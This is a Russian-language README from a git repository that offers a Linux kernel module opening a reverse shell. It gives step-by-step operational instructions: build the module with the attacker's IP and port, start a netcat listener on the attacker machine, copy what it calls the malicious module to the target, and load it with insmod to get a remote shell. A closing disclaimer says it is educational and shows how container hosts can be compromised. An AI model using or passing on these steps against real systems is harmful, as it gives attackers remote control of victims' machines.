lkm_reverse_shell/README.md
2024-07-06 17:10:46 +03:00

42 lines
2.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# LKM Reverse Shell
В этом репозитории представлен модуль ядра Linux, который выполняет обратный вызов на прослушиватель для установки обратной оболочки
### Инструкция по использованию
Для успешной эксплуатации необходимо подготовить инструментарий для сборки модулей ядра на атакующей машине. Установите пакет build-essential и заголовки ядра:
```bash
sudo apt install build-essential linux-headers-$(uname -r)
```
После клонирования репозитория, откройте файл `reverse-shell.c` и измените 13 строку, указав ваш IP-адрес и порт. Затем соберите модуль:
```bash
git clone https://git.vadimbelous.com/vadim_belous/lkm_reverse_shell.git
cd lkm_reverse_shell
$EDITOR reverse-shell.c
make
```
Получившийся в результате успешной сборки файл `reverse-shell.ko` это и есть нужный модуль ядра
Запустите прослушиватель на машине атакующего:
```bash
nc -lvnp $PORT
```
Перенесите вредоносный модуль на целевую машину и подгрузите его в ядро:
```bash
insmod reverse-shell.ko
```
Если вы всё сделали правильно, на прослушиватель придёт обратный вызов и установится обратная командная оболочка
### Disclaimer
Этот репозиторий создан исключительно в образовательных целях, чтобы продемонстрировать потенциальные методы эксплуатации контейнерных сред путем загрузки вредоносного модуля (LKM) в ядро хостовой ОС. Автор данного репозитория не несет ответственности за любые неправомерные действия, совершенные с использованием этого кода